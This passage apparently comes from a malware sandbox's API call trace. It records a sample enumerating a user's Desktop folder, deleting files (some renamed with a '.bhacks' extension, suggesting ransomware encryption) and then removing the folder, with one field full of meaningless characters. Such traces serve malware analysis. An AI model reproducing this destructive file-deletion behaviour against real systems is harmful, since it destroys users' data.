nFileSizeLow=0x16750, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DN0hvZxxCeH-NYAF_H.png.bhacks", cAlternateFileName="DN0HVZ~1.BHA")) returned 1 [0107.289] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\DN0hvZxxCeH-NYAF_H.png.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\dn0hvzxxceh-nyaf_h.png.bhacks")) returned 1 [0107.290] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0107.290] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\dp gvQR2 MYwMzsW1yo.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\dp gvqr2 mywmzsw1yo.mkv")) returned 1 [0107.337] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243e31c1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x243e31c1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="iCkvEIW.png.bhacks", cAlternateFileName="ICKVEI~1.BHA")) returned 1 [0107.337] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\iCkvEIW.png.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\ickveiw.png.bhacks")) returned 1 [0107.338] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0107.338] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\kFQqlJY89ZuDyS.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\kfqqljy89zudys.ppt")) returned 1 [0107.388] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0107.388] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\luPvkk7BP6.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\lupvkk7bp6.m4a")) returned 1 [0107.389] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0107.389] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\P-7IEYH2CNc0UByn.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\p-7ieyh2cnc0ubyn.m4a")) returned 1 [0107.657] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0107.657] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0107.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75150 | out: hHeap=0x2af0000) returned 1 [0107.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0107.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0107.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0107.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0107.657] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0107.657] TranslateMessage (lpMsg=0x8cf968) returned 0 [0107.658] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0107.658] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0107.658] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0107.658] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0107.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0107.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0107.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0107.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0107.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0107.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0107.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0107.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0107.659] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0107.659] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0107.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0107.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75b28 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0107.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5f8a0 [0107.660] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/yi TyUTEx1dVRHalW", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW", lpFilePart=0x8cf650*="yi TyUTEx1dVRHalW") returned 0x29 [0107.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f8a0 | out: hHeap=0x2af0000) returned 1 [0107.660] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw")) returned 0x10 [0107.661] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬